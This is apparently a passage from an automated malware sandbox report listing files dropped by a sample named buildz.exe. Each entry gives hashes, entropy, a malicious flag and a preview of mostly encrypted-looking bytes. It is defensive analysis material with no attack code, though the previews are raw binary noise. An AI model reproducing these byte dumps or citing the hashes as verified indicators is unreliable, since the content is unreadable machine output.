.T*l.!5.........k.bk.....|.....x...o.X...nn..6Ir..h...>..&...R....-..."7.#.L.[..w\..}...c..'..*...!.I.9.U.U..6y...........1.`nq..g...........o.\db.]........TJ0..:{0..'.^........h%$...E..?D....\.u..........fx.Z@oZw....m.ga. .+-..e.L../A......l...+..'.....J.....&W...q.....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):8526
                        Entropy (8bit):7.981897280050456
                        Encrypted:false
                        SSDEEP:192:o4VnN2trb+XYerBU7UYo30p0nrEX4dysBTnROUSLb4hihAA:rVnNYb+oedcEEp0ru4ss1ROd8A
                        MD5:7C99BE85CA480707D1896A0A83CDF439
                        SHA1:256601725ED3CB16F391E0A0E9184AF6ADB6503D
                        SHA-256:FE73A0F2D67C8DABAAE11DD13957DCAF5B0E103A50A74A8D9CBA6EC5CC03EBBB
                        SHA-512:C4DD583472DBDD81258D875032E8C74991593A922D0737A5F29FFE4B856D014F7333986395145B5A3601609BE8C880B12FA8E56F19F8E666DE57DE94B5E24030
                        Malicious:false
                        Preview:regf.c....8.u..TkQE..w9.......)..t5M...:.h..)X.Wj.sM.L....s3...].M..c.,T..hd..A...............pi.(...3..|I'..L.Fk. ..3.V#C...h.....+3G.Z}...GCDL.9..V.e.d...Fre.k....=y.F.^.U!*....8.6.!.<.....v.....k.]Q? ..........M..1.z.(...r..Q.S.8..q-bak0......4.I.f...X.UY&..J...Rv..i?-%...}.N..@&.J...ijQ.T.........%.\>.5..?Q4.5.bj.220..dX/.:..e..n)e.'.i..5K.D..4. ..L.i?T.U.........Q...j..a.:.i....r........%..E.k..k.f7:...d[.ob-.6.'....i*.JE.1..&.?zB...<.U{....S..&Z...3.\.!....z..-.....,D....$5...33.TW..NzN.RV...'..:.....g...e.9.6..[2QS.F.(...Uf{G."!o....t...7.EG.4..?e.Pg.D........g.8...!.aI/x.....,.Q.*....t...,.........r`.\..b.|.t. #.4.v.U....~.Q.|./..5hb....No.L.p...N..Ah'.&....G...".M7..;x.2.....~....s..CV.|....Of.....Z.}g(..7.s.yr_X....<.../...e....h.(...t.....G>n...+.,'.|..0.h\...:.g......s/.z2.FD.n"..#.~..../.C.`..p..TR.|X .P..'..]...t..N}......1*u.zA...U.g.....s.Lc+.......yD?s.l.CHk.........y.....?S/.....N......>Zl.$....a....v.w..E....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):8526
                        Entropy (8bit):7.976472249700768
                        Encrypted:false
                        SSDEEP:192:zrTWCI9HSogAJPrxNhXVDJJ3Cju5LPyswlYrbb++iUN0EfS0aYxYyDA:XsSogAJFNhpJJ3Cju5PN++FaY+MA
                        MD5:252D9F94D2CC6D960E47246C3816669A
                        SHA1:41F5EA22066B9E6EE00E6370EC07C07D1ABD4803
                        SHA-256:C1486049CA205DC7355E40CED3054A700BCCB955DEB6F578FA385EAEE7CF0B32
                        SHA-512:139A51947C15F87970CE19E7EFAFCBE1364E9311CDA004CE64A572C0FD4C3495904A27B63369243D50EC5E76C1B43AF7E8617E24F84166B4859B7760A879ADF3
                        Malicious:false
                        Preview:regf...U}7.x.y...)8.w.H'...7....y3..2.ZO...D..Az...7.y..*......#.....<....H.[%g~)q.......q.3.....R..i9.._.D..)j.PS+.v../S.R..s.. ....'8....5.......:7...~..C..;.......{.U.V..Z...m.|.E..dK{l...n7d.M..iIf..Y..?b|..)l.....T.0...63O.....:.oa.GAt.........j>7pg....>..<.L...\.;.o.s.....^.J.&........q.$...QR5...FB..Z..+..v.j.P+':........wiR.....\Yk.N......./...A#.@Oi`[s.B...`....}....../S.$Hyxo...Oq.4.;*<..Y.&.dB.Jq2.9Tv~.c=+1......'.._....G....x%*{P...9 ..@yd.:E..g.....UK#....:..]....V.^....aM...<.;.....iE.jqu.b@7-~.C..}....Z..\.q...R.1.;....m..d.lY....Np{...l.U.S........R.iZ.p.hoe..\A.4..ur..b.j.3.X..x.&Ef&..w7.0.+.1..1;..kj.,!R.....p......m..5.k..$.....7..F....@...."Il..0......L..i2....y<].e...A..zV...tX.l..S.D)......-_...BH.F.....k.t.$83`..5...z.'B.1$U.7....._.M.g.....e)...s#.. ...6.p.,0}.......@.me.&....C...A.ta..t.S........sB....OI}.0.....W...Ha._..G.;.a..FCu@c.s...i0.wTS.."b.:....n.x%p..(....lj.B.(V/..gn*.\..z.....'G#.G_;.9...x....{!.'
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):8526
                        Entropy (8bit):7.974560720124672
                        Encrypted:false
                        SSDEEP:192:VVsURezPBZMzeFp9ud4CD9iNYMihVMRcDhIE7dcBmZ5YYSzA:VVsURezpZi9iNPweOGOYgRSzA
                        MD5:3CDC4281ED20A9F93D2549F5BA85305F
                        SHA1:0FA9E464A8DD26DBF8A3EFB93D8F758C3E8EA59F
                        SHA-256:5D6F1DD21AAF881C7AF5693BB95616DA869226B92E95C36150D164CE7C8D86D8
                        SHA-512:55A835CCC6C680B81AF3D09ADF1DAB4713260180B189029D9119E6C36E84C0EA7E87813915411C73A338CF6E7193FB7B261FAB537A2E169AC20276BCD00B0987
                        Malicious:false
                        Preview:regf.e.......B....Up...M...i......0....r......;.......:.X..~...T.;.$...u..WlW.=.m.p...G.fcK...z.%zV..-#......Cp..&-$....A.!.S.._.....`...w..Z.....W..7)....%.}.. t...~g..a.X.@.......aJ....CN...f_.5.....{.2...b"...`.MN--.Kd.|....*.Q IJ.-P.....+...Z.. ...D.....O.]..i....V......,..".F..M.i.8i.3R7...A.k..9zD;..{v...vd....j... 5.......~..P.y*......%n.--........%....5..{J.E....y.=...p.D..F.%.ik.`@..8...x."H....-.r.x.[(.......q......?....=....i.R......)..M....2N].2.....j.9..5[J.oN..:.L...V..hm..|...4_SY#..:P..^...e!.J.G...L.S`Q..i......G(=7`T...F.&T....:.......H:pb...._..<.V[......n..A..N.K....vZx....].V.....^.I.h..D=.F.b.0.~..yX.....<.:^.Z..........e].}.Z@.".y&..].%.Y.P.gs.......f^...2I...S....w..Q.?L.lL.X.....(..E.....+l-..m...|./.B.y...Q...r.?.......pX.h,o0....u..z}i..:.V#..b....v..ki...,.Q-.n...V.`.....f.v.F.X.|.....(!..[ZbM..{....H.+...r...^.i...9. ....y....... ...X..|'.....V./..kp.7.....=..QUB.I.=]$......;...I?..n.d|a..]...'.D.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49454
                        Entropy (8bit):7.996193483208473
                        Encrypted:true
                        SSDEEP:768:XSAfpr/YWVmEzSiGG1Sg4qnFp6BdahklsLBmZ1a9Y07TnqHLProDyOQmsgcA:XrfCW+ivzF/hrBmq9YiALProewcA
                        MD5:DFBB5D4C93D8C423D39A845579FC9B2E
                        SHA1:45D08340FFF2AEA69E40213F2A32E3D2AE38EEF9
                        SHA-256:0BECEFF7771631993B8661C3B04A6F8F31FAF59CE0D0DF06C595DB93531DE4C5
                        SHA-512:432CF910553EC5F6D701320E234E05E8594C5993113379B56CDD47B08C56B63F73ADAEB5DB1CCDF2BD3A74A6B32AB87A486F712113BB523552557F79B4D36617
                        Malicious:true
                        Preview:......."......*2.)...y.9.R.3..-....y..f4..4.}+......e..G..FW^.3.c.{..[x.2..E.z.H..b...*..}NT..IKAoI....)?;..9T..`zqOV.}6V1.e3.T.U..D.W..p6..w...3O.|dV.r58X..|...vQ..(\.m..@.....9.L.|Tv.r..r....n q:..v......^...!R........VzV.EOhTIT#\..d.Z3].N..P...0w....M.F}.... ......)...w.w0u..........^U.T.....h.[s.D...6B....\.....T..A........u...L_.....lOM.`...MY...J..nn5.r94X.G9[....l..../G.|......2.A.@....[..L=.$.n.J.<.,"p-=&....SC....In........32{....@....".@..*&.*."o..a....Z0..K..-..?zlxl..D.V.;..~...Pp.h./../.M....L SI.!..?c.G....^x..#..*..B9]...jE........(Q......^Y.....,.dW}.w/Jwa..X..^h-....K.......P....\..aO..D...z.(p..56 &...O.e.R......X.;.:Y..M..GT...X..v>.c..7....+.1...87Z.l....].....^....%r........KE..M.].V/..s)...a....1.........%4.P..:2...H........=.k...-...._..1..!.Z'.&..UJ.G{....I.}QW.*.....H....pT..............Z......bYN,..}..( .\#.H.$..Fj...h.X.k../.#. .....).,55V..c`.I.u!.{..3...K...F..-...i.8.#.3Y.:L..:.'..:./b`[k.\...z....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):347
                        Entropy (8bit):7.2936373688237826
                        Encrypted:false
                        SSDEEP:6:Xk/LhbLaKlUcLdZKt3thwHyHrY8ta5Dz6mWjhThX0aKWvVXMr8FGcii96Z:Xk/Lhb+KlbLd0t33YyHrYEa5DzpWtTi3
                        MD5:21DDDD23568F972F1AD464ABCC83ED13
                        SHA1:DDADB04441EEFFDD551C0502BE19F643E06794D4
                        SHA-256:7F57518AF24E1D90F269821D341518C461265A0D260939A3D3200F3DA65623F8
                        SHA-512:BB2558B01E0C342D8F1410083EC093BA67C798CA6B4D4FF06DD7489B1FC916605F42DBE99D8473681E5C1B30AC3DD2E382D57AA09BA9442848520887D7A8C3AE
                        Malicious:false
                        Preview:<root.`=OX.W........)..}...^.....K.q&.......$.j..*.MF..n.R.O...8sh'Dy.|.w..ie4...g|V$...+...ARL.G..r}.\..."G.....X.O..d.St.7.......E.T..*)U}....l.x..L.9.....(...?...e..a"........QCC.......,.,...L/..K.6..i....m...K....o.~.q}...t..%F...F .v..}%.....9%.....#..EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1573198
                        Entropy (8bit):1.3861819420777062
                        Encrypted:false
                        SSDEEP:6144:AeIHKEe0LCOjTIZbGPaFtFNqHx2KT3sv7GTn:AeIwgZTYGPajSF3kG
                        MD5:217D5ACAA934BB437BE11F41B9E2CE13
                        SHA1:D2D027BA50D2885EC1B63F0F38129B5C8A70D585
                        SHA-256:2392EB3D0E57761BDB4EDDF7140DA175C485AD930DE27E6D3BB8FBDE8E3A5907
                        SHA-512:BEBE4E3993A4E095D1D07C89FB69FD364D426C2B9B8F36FC03C89AD7962913C27C768769CCE692EAE3C9224E68342F8BF979476982DC2ED22C3AED94C047607B
                        Malicious:false
                        Preview:&.v[.3.F.....S....I..BLx.............M.m.5.Y....+....{1#....S.}..,.3."..w\.".......sA*j84.G.t.Y,.".....T.?/..rVQ.]m2...+...|.UPUr......4.$...?).I\Q|.<i..;........,..e .....1...q...c..\..qOR......D..B...".y.............@..4.!iL....z....G..0...j../cE...B..?..S........,.N@o..or.....i.....B'..h'...A.T...:.mX?.m.Z}..{....%.=..4.G.8j........62.5S".....`....h...6.S&Q...}.ll.F..6h6%......y".'..2..W.+8..... h.......5...}C..X...O.....!f.&..:k......X....L.-.f.X.W........N...=...$Q..O-..Z&.....z......G\"%.@..i........s..-mP.|A..#2..=.#}..w.2d.....+,&.}.'.-:. ..m&.7..!tu..t*."g0GA.h^....fmk..^.k......s\...(..Q,!..C.JxM.B.Gg..`.....u.....;..>..$....O.\.Nf.....j7.c4'.q.'......!0.)...y..\~Z...*iy....4...v... .H.Y.nt.u.6W.f....n...-.<..R... ..T.8* .s-..7..{.^......[.6l....|^......{......P.\....'.S..'..1...6.C.;j.(K.L.`N.m......(.C+........~.....E.../...W.B.......^v..9.0..e.L.{.&.5.w.....;..e..[.P..<2....8..Z....tB..A@.....i....>..I...L..MR...e..Xr.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16718
                        Entropy (8bit):7.986710947395103
                        Encrypted:false
                        SSDEEP:384:OAZYkP6+bWO0OAwGt7OsfIzWoPZKR3JpAKoIYiA:5ZYki+bWOG7O8IzTKtoKouA
                        MD5:D8E7A9E690A903E90E75378DACAB651B
                        SHA1:024C6155F7FFA7236AB732F096238F97B982FFCD
                        SHA-256:A56B29AD12A7F77BFC3DC721DA71411078CD5F3D1C432F6955F1E1E35819CF42
                        SHA-512:57F2B8EAE0276E472FCC2BAD784F1E02185089E938A1987909904973C84872C49E0F2D1CEAC45B417D48403A1B4FF2686D9B4926880322654038D0E9EF6800CF
                        Malicious:false
                        Preview:..`...;.)F3y...|U1"Y.>|..u`]zSD....Y.,4.t:.l..q...+.<s...]$..^..8..q...w*G..q....\........]...N.8!h.#..K...{b..y."...).......\.P.@....h...uy.X.S.2..C.^.>.'..i...R`2..d.!....P...~Zo.....}T....$.zR6../..q...r..G...R..;..Yj.$7.\...t........>....[..'....}qD.N.~....[.....+.d........,.T..b2a...'.....L.@)......0&".x6.j.;L..Y......6.Q.O@OQ.. .&<.d..Eg..E..(.3....r..3....0x.x.PB.$.iQ.*.:w.-..@.4.{aE.x....zb.n....!`....!*...j....{.B.Eq:e.4.w..J...`@e.C.+...x>....^..y.A7. ..f{h/..@k....c......b......(.S'<"9@...d\...$E.c.=f.h.`|.I{.S.....|.K..@<x..o..}r.#...6|.W.-Z...9M..3....jv0.q.........[)p....p...k+..?~3..y..{..e.u.......w.m......*q..'d.MV..^....Y.s-.C2V.....E..Z.V...j?.Z+.J.QABD.d*.g5.Y.92..h...)!j..tY..N.h...fr'...8B..:l........=}p..Ca.N.yV.]l.Y.*/j=...^F-d.y..w.h..u........d ...Ob.T.f9.X&.e.....c.J.u..br R..x....+)1..Q$.Xy...U..N...V!a..*.5.G..T..X.....+f.<...%.z...).M.f.A.X......*/=>a.O']a.....3n.@w.......e..I....v.]{.....|.'`.^/hO1.f.W.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1952
                        Entropy (8bit):7.886816871935922
                        Encrypted:false
                        SSDEEP:48:m3lSnDWVfCHqp9BJoDanvEwIy6tzaVfKyYQRdTlUD:m3lCKdJrnv/IxtzmfCQRdTlA
                        MD5:99BBF559D0F2AE99B3AEE3D3C7E32E42
                        SHA1:9C5B6780091EAF086B03DCE38E023C7B198BEA47
                        SHA-256:740E4886CD423D4C4880092FC9C92173FB9911B650970589B99F0828045159B7
                        SHA-512:89E6E1D11914A910A4B971E08A492C30D98ADA8513955F8E2131D7E63AACEEBAEBC83E6AD0F27896EDB310945F2C339E0790FF291201F711E5081FA92CCA34A8
                        Malicious:false
                        Preview:1,"fu..:...0Z...).t_..B\i....s..)NOj...61C.Cb.....c4.....O`Jp.........D#u....a.I..l..c...7.9....EP|2!...DY..EW..}.-............\A.C.0R.'*..9,..Y....Zb\.!....`.}..E......>..k'9...].pY.'.`=.[Hc....0 3.xNik$.q\_!.......m.^.>)K...[.......)[x...{..5......;.N\-ww.'w....j......l_..0.'..U.,...J..QV.:..o..O.:.....[.s.7e..^...>.V/..=...f*..]2;L:..UY.]3p6.v..Y.,.y...).Z....Tt8..9w.9.B.q. >:mrY-..J,.).(d..mL..#9.c........B^u^o.O.I1ps..r...~B.m*."%...K.c&...DG...<9...90.......!].....t.3"..2.6 ...g.7&b..0f..f..K....N....g..I.;.6s8...g......Cu..t.!.Z..v@...9..k...1..K..1...jM.@..@_.N...q.q.W.....`.>`.3.h.N.......k..3P...2.....S.N........./.n.&aC9..7..!^$.;!.j.6..s]..Y..i......"o..|J"...J..'..L].o.7Mwr...^.y...1.Y.1..@...Ckz>.....9.....Y..........."......}.BM..m..`..?..>.|. @.,...l..\%... 3.........W.h.Y........m..[!:.['...1.Sp.N2.HP?.....l.1..7..I..r.z...L.a|bf.-.8.9.....s.Rk..i..D....Y....[.......E.+Aj.z..E.[v...K9.x....3{..4.<..A....|..a...wrv.O
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):8526
                        Entropy (8bit):7.974132807056781
                        Encrypted:false
                        SSDEEP:192:bLV202487GOF/jEZOPPEae35Xsl2uwCDztBuA:bLuGOlcyMaeJXsDqA
                        MD5:894CD3DD82E17A338B532D54E237FF1F
                        SHA1:DA4D43CEB87983F49A69CBAC352C9D42999F74FA
                        SHA-256:A42226E035B5F2164EDF3F4680DA7DD2CDAFEF904D36AC7ED24A8F3E146A0EEE
                        SHA-512:A55F02152ED9269D7850E35FCB3F5F32214DA42F9DF88168C5E939A9F9B877A65C2E60E8A46691C1B13CF7E150DFC2E4567AD5461904B8CCC5D219E78C8E9518
                        Malicious:false
                        Preview:regf.4.a......X.gl....... .)dd.....w.0]55..f......z..g.[.,$..j(..#.lv[.!.HIG.....e.e..83...:..uQK..s).V....#j....-'kJj0G.J......i.x.Ax..>.|/.)..T=..{......&.3...,.N.mdd.K.c..5..<O..rcK.z..)..].2..;.K..1k.9..d..D.......B.:$^...d$.;&G.\.."......$..'.7.../....k.H#e...l.f1..n"m.=W..Q...^.*".k......8..}...:W.7. N...s........x..+.EG-@$.,gM.3+.RQ..\...N.k.;F.r..D]{.{..}H?.....@.RG......-7g... N.o.Y.....\.e;p2!C..W....A.}......Z....c..j,.X..2.R..V..!M.<L4...7.....H..i..|..:C.."...A*..88o....?.L....hX...j_.]c...)um..{..+h`.UAI:J8M.\..I.........=..^.'.-..g..hm.!.x..A.|.A....S.hv>`..$kX....rY....?.....8#....0.h.X.h...Ro...7FT.B.-B.G....$..+}......0ID.(..:.0......Y?..W.r.8...bb..[.......bP.V..#..s..K...k7.W..@.v.Xg`.f.......m.f.......^..kh.I..2..k...iH:.5.........)..2k.L...xK.u.}....F.o..F.l....q.......iRWV.&..a..T.6...zW.T>c.U.O.N.{.C.{L....U.%.l=x."... |.S[..Wj5q...#..^.df[....O...xP...........HZM|..pNn.C...-Xi.V..,9.t.3.(........f.9L....}P.gi......'...~
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):8526
                        Entropy (8bit):7.978738347579811
                        Encrypted:false
                        SSDEEP:192:OVovcjGgIvZLQnCXFllwKDznnYdnCi9p9UQzUwq1I+XJGgTfrrA:OKcagIhoCXFQKDznYdnCi9pLQ1bsgzXA
                        MD5:2E988DE7EB7E9B9DFC583835E1512DB5
                        SHA1:7FCCFBB9DA6165772A604029AF697F58CB58F904
                        SHA-256:C967C5D25085AF102D3D1B6FC00DC574E4A62F1D006653AE8FA939084B9FA4D6
                        SHA-512:6503C9B64CDCA5EFBC995AE746D82EB1D47714F38C7384CA66D1583E30BB86CFEE36D7EC8CC2A662D18B630E1D3C5132FB7B7976AC197D174455B9DC0414281F
                        Malicious:false
                        Preview:regf...2.#@.z/.:.j...z........O...[..;L.....ok......+.)....F.e.Z.8.w4...#N~&.J{4}....16S.q.t..n>%..k.G9/..S.7.g....s...9.fY...x!.;..4..nK..R..on...B.....F.u..z7.''.r..A.-(.0...*....@.RI.../6..CS.......lW.k..+....>....n2...5.E.e.M..##........Ws_();-.YQ...0..>..&.....&#*I...b9..2!}tR.|U...[..%.U.'9x..w.RXd....37.{.z:...!C....7@...CTg...$_XTr.G(F...d........{....v...-ng...g..6.....$^+....{....$..HT.a9=/.......&.;.....-.`,;.j'!&"r..h..u.$...P.......}......Oi.l.X.$.#:.....lA.q.......~....^7.+.....9H.~.8........w{gdN. 3...C......K.$.......C3.....g.j....Az..a..c~....w.s..5.....e.3...e.p..U."yA.....B..s....T(u..H.....D="26p.......z!..6.K...,'n.[....h....}.X.N...n....e|.<L+.w_...L..y...d.......E.. .J#.[.d.$..i_LU..5....y........!.;z...\;K.x.&..e...~W-.Vr.....$...u....Rl.wn..-..e+......./.>|.T.u2..P...b0...pL.TH1...:..f..XnYg...sauZ.Q.S..........v...r.wo!.y...nc...|....Vm......\m1...LyD.N........ClK@Z20yd...h...eYzr.n.\D..= -Y.k.w.?.@..t..t.B.aj1>.Vd..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):8526
                        Entropy (8bit):7.976373096396677
                        Encrypted:false
                        SSDEEP:192:B6zsfnV1ZYWLZ+2Thd4r3X+yj9dBOmeUXaEnyu1mG/bSd+BQoguA:BLfVDYgTErX96mxKEnT3/bwqfA
                        MD5:2E4E5AAE9BA04CAB8D239A42B9F57973
                        SHA1:994F248EE6BF2AC749352FC89E1EBA85D364A604
                        SHA-256:A99035625DD6CB945F31C04AFDB7124A402424661A2044D52894A820B23059FD
                        SHA-512:C9F84AB2401963CB267EB9F17EC27B4EE7BCD4B691EF0E88157555E94103F79D4FA108759CB50449702C2ED0796B8625DB358FEABFE17B9B5C98FFECDA8A4475
                        Malicious:false
                        Preview:regf...|...I.N...C.FE.q%..f.....;l*..q.......Yk...,F....j.....O..[.k....l....Q.k\.<e.R/Q.z{E.l.+...n.d.6(..B.?..^..'%J.+.....8..1..(.B...Pj..>.y=v.C.pv.n...2.a..?...F.."..E.sj..9v........C.=.....1I(...b.1...D.......C.......%.r..)}.....1Y....c.r?.hzXE..;<:.5..:T...o9 i.O=.O~3...'Y.r....X.8..s.;.../.....b5.ZQ,X3;4..s.$...e8{....J..A.".,M.V.z.....oUD.w.\.........T..0E....4..%....3.4"......b9.C.....n%q.M.....a..nT..B..IF.s ."..:.8..w.$z~.c..k].....FB..!.o?..0..~hV.e.$.cV.......f..c.......,.U0Wq:.....M.,b....OG.?.8..r.....J.......{0.6...B..2.$q..^Eg.v...._._......%_..U_[..<..l.m'..: .8...2.....L....g..<. .st...O.A...F.|.@^9.v...8.....da"..c.'.,..!c.....L..E(.!.&:.....oL.l..X..b...8.z.....n..xoq..A.....!./..bU.....CO.....N.OS.....*.9..M.'o..|G.*.. CT...O../.......D.G!.6..@.7(II./n.{.F....x?...E.w..'f..M_.yM...-W.7u..+fb...D.....\..Ay.gt..w...{r.....D,.%.>.D..................X:..`......3.?hj.(..S.........z.....o.z...8<...L..e.....t..)..k...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):8526
                        Entropy (8bit):7.976177507577839
                        Encrypted:false
                        SSDEEP:192:jiIa+tmPL9qQf/FCfbx8/QKOJfyUbWhQGeCr3k+tVh95+JA:PHmF3F83f1WhBxNQA
                        MD5:5CB1697373D172C4C88B773043127DEB
                        SHA1:B0BEB80ED617AB8103B0BDB2DDF5A19FC1949C9D
                        SHA-256:A76D7DACDFB740FA76A5594D98325DBBC68CD6C07287DEC42A4E3CCC890906F8
                        SHA-512:98B3983DFC81883247189D1AA1A093670D8B48876371D725566B3F8ECFA30AB551C42BD2962E821FDA9ED0E980E7E160236FA40ACAFF2B7AA20DB5704B6491BF
                        Malicious:false
                        Preview:regf...{.P`...V..]..".8....z.... .@.vQ.2..N.....CY...-ko.t.d.M...4.^N..a.*.g.A..+w.(i.0n.%s.;..y...U......-...Ew....B.=....f..:.v.G..UhV.....kr;R.%N..9...8.;.}.j.G..d.<..NR%0.kJ....yft.EL..........p......-......Y..n^.>....ayBM...].q....V.....U.c<.=.A..3rMXB.o.CnM.L..K.......5./_.1.P..T=......RO.W.)G.4:.6.7......5.FF:.... ..`....7.......I.....-mX....A:.#b[...8.+.)......[.,..W.r..+..,f-.&W..9..k......2 r.`..k...N.IJ...Z...[.....A.G.$.7...Wr...5.v.8L..w.)v..%.(..ao.#$...%...p.,1...x>..s......R..#. ...s...%..v...^0]H.._9.....y.D.......@H.z]...q.y...kI./5!..B+......~./.[D.<5.[.Ns0.\..?..l...e.[.....6<...4.f..=.u.b...Kg.....;..K..#mW/..`..,..:*/.l#e...}.PF.Kv.;u|6..R..*%........1.....$.O..........qGSq.$.^....5..p..($z*.z...rbG..'....X.Z.)../....^.h...X....y.=..`1.BH....x....k.r........mF.0U.q......+......'yT...xp]kKw.T.*.=..N.[%.._.p.:U7.Z..../...$...j.....l.b...x.m..W...:...+H......C..e......M.I`.9....]w...9..w.6.y....3...m.pRe.....Fr
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:MS Windows registry file, NT/2000 or above
                        Category:dropped
                        Size (bytes):8526
                        Entropy (8bit):7.980317685608875
                        Encrypted:false
                        SSDEEP:192:nr1in1X3D9gY0+M2W2D4HckiUUgjSGeP7VpA:nr1I1X35giMdm4bjAA
                        MD5:035A399B13ADDE540352FFC2B87FC8CF
                        SHA1:E650CB7FE14727E278A75E7C9EF6D31CE28A5478
                        SHA-256:B93DE2562F0F534EC5BC4A783EAA4FC0DD51910BD6D38990469EE62D7A65CFDC
                        SHA-512:D0C37D3E6B203EF1E56F33275ECCADA6E7E73461A45C1BB88B7F55F378B69AB29A5730AFAB5521D1900242B2E8D66499126ABA249D87B80B86D98DB35511402E
                        Malicious:false
                        Preview:regf....a.!..(.L.h.~.....M.......Y.s..hA...5...^....R...f.N{..p..pz.8m.?..\.Y@0::..ISaH;.._.....J......|.M.E.+$>.D.F.A..6.K.%.D....m.[V....h.I..\.`.HO..,I.q.R..2.uOtb. 8-D|..J..%.K.y.C...1.....l?^..y.`'3.n...j...{ uw5.O$+...-F}..l.l..1.:\...+.P..f..w...g$....B.n...&...'..p.oz?_'j..x.R.mz........1R...;9..#......@J..U..(o........yyr.xS...BK]F7i".....&.3.Y...9.Y.x.!F.xR...._.7}....<.wm...v.]SDDa.up...._B!.Th.O.@HO........~u.H...ly....N7)tq-.6......C.+.....4......xc.t...?..y..KT.j...7.c..4..[.c...~..qO_-..H..q.s..E.1d.%9...TE.6...{O.1.k...j;..FA.q"......+.........K9....\....y.},...^.l....W..IN..."..j.t.........P...=..v.~..k+.."....`.pR.!t..e.....Pe~T..(p.-[...D..d...o:.7..-u{..>.[.J.......U...%\...&..#...xeO..........-..{-.2...IB.....w.....J.7o-.....cK=.R_.+...x.o.....P...7.g.A..=..U.."...["S...V.H.s]1...l.n[d...<..R.}/...|.J.....@#.g...F..:.... .W.B.>.g.5.N........R.cwK..n.S...A`.s%.PF.\b..@..H..F..{#....z.f...x;..F.},.`......uC..=..;..[Z.n.._Z
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1573198
                        Entropy (8bit):1.330200057776718
                        Encrypted:false
                        SSDEEP:3072:TRH4vGW3WxN//Dl97ZpwASjVVCJH8w277sSvxd+ar0aRA:TRY6dZpwASBwJH8FPU
                        MD5:C141D26D3B8B19E9B21EF05856B1C8DD
                        SHA1:ABF790ABBCCA4C47EA4CE77FDBAF044247574604
                        SHA-256:8223D3150B9FE5C183A88EFDFCA5AFE4B60F8C2CC603DE9750D39133C7C4C533
                        SHA-512:D372D1FCF27604FDCFE4E34632B7566D19703104EC34AE34846816FB5EDAA220B2296D97D4B999FCA90998D04904FC9CB899994621AC0124B1DA051BA916144B
                        Malicious:false
                        Preview:.}....&..wDW."36.pi...|-..&hG.|...8..K.._........M[~>k....g".:/.&;:..*....B.-.*z.....7s..o1=`f.(.$....q)*...4....au..a....5..j:...w.......b|J...El.... .C-..V...q.g.......A......>...!...zLT.r..j...W).a..F.aM.>.m]{^.MsQ_.....(pp6.....|.O*X>.g.%n....6#....}...u.B.I.8.....b.qOOr'0Y..../L.S......)VZ F8b..-G..H..o...+;p..?....w+....^.s.dE.Sa...:....F.&*.F.):'......}.=&..`......'..b......A._.T..?Y..@.oc.G,G/.BrC....dD..8.H`B....W....NE.n...P.;...k..o.......Y.[..?.K}.....6.d>...+......4.g.t].f...Z.I..<2*.j....biH....1.0..q(.$..6m.......H+k......,.)...$....;..WK..I....u..q80...>.$JQ.<...t.........S.P.@4.../.y...7..I..?.I?.....s....^.W.F3......5....4.....0....Y....E.b.j6.H.,.^.^.B.....s.W..T&.....@..6...:._..h.U9aE=.k..w2....~.N....)rA...`..rb.a.z.MS.epx....yp..:..(..Pn<..&v6.........p.9*(..#VI..h.>../f0.O..m3".gq..v.j'......eW..s..4...Y.........xc..HDn..B.......#F...9.......R..i_&......h.....).L.}...B.......2Xh....K..8.....d.~K.'/V
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):16718
                        Entropy (8bit):7.987144846789765
                        Encrypted:false
                        SSDEEP:384:U8aVpYklnFl40O3soMhjCJuWIjGdJcgx3OEHFVVs+vA:5a/YmpQsoM1CJuWIjGdSgx15RvA
                        MD5:C51DF447EC6C9E7230C580D4E8E507FB
                        SHA1:5D77FB9BE7642E0F194762A4D6CBB91DF36045A3
                        SHA-256:20EBCA177F0192ED03074A247F56ED761A7F5DE474B0402492208EDB07267D0B
                        SHA-512:523E02AC1D2B7C995ECED5E7F2A24BC58CEA226CD1C91BF970BA5C47E061E39BAE9EED573E452A31E73C01EB6B0163E6F84A370DC18228CC9249DA32049DBCEE
                        Malicious:false
